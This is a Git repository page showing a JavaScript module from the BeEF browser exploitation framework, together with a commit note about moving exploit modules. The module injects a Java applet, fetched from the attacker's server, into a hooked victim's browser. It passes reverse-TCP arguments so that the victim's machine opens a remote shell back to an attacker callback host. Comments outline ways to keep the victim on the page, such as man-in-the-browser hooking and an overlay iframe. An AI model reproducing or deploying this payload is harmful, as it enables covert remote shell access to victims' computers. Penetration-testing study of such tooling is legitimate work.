Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
40f8b528aae1199783da64832ab508c3d7b9f576
beef/modules/exploits/local_host/java_payload/command.js
bcoles 40f8b528aa Moved a few modules from modules/exploits/ to modules/exploits/local_host: 
activex_command_execution
	mozilla_nsiprocess_interface
	window_mail_client_dos
	java_payload
	safari_launch_app

Added a couple of XSS modules:
	cisco_collaboration_server_5_xss
	serendipity_1.6_xss
2012-06-24 03:10:54 +09:30

55 lines
2.3 KiB
JavaScript
Executable File
Raw Blame History

//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var conn = '<%= @conn %>';
var cbHost = '<%= @cbHost %>';
var cbPort = '<%= @cbPort %>';
var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/anti.jar';
var applet_id = '<%= @applet_id %>';
var applet_name = '<%= @applet_name %>';
beef.dom.attachApplet(applet_id, applet_name, 'javapayload.loader.AppletLoader',
null, applet_archive, [{'argc':'5', 'arg0':'ReverseTCP', 'arg1':cbHost, 'arg2':cbPort, 'arg3':'--', 'arg4':'JSh'}]);
//TODO: modify the applet in a way we can call a method from it, or create a Javascript variable in the page (to know the applet has started).
//TODO: after that, every N seconds we'll check if the user RUN the applet, otherwise we remove the applet and inject another one.
//TODO: =========== persistence techniques ===========
// the victim must stay on the page while the applet is running. we don't want to use hybrid techniques to
// download platform dependent executable (i.e. meterpreter) and then kill the applet.
// we have 2 options:
// 1. use the MITB code (currently doesn't work on IE)
// 2. create an overlay iFrame while having the applet runnin in the background
//
// 1. setTimeout(beef.dom.createIframe('fullscreen', 'get', {'src':"<%= @iFrameSrc %>", 'id':"overlayiframe", 'name':"overlayiframe"}, {}, null), 4000);
// 2. beef.mitb.init("<%= @command_url %>", <%= @command_id %>);
// var MITBload = setInterval(function(){
// if(beef.pageIsLoaded){
// clearInterval(MITBload);
// beef.mitb.hook();
// }
// }, 100);
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Applet with id[' + applet_id + '] added to the DOM.');
});
Reference in New Issue View Git Blame Copy Permalink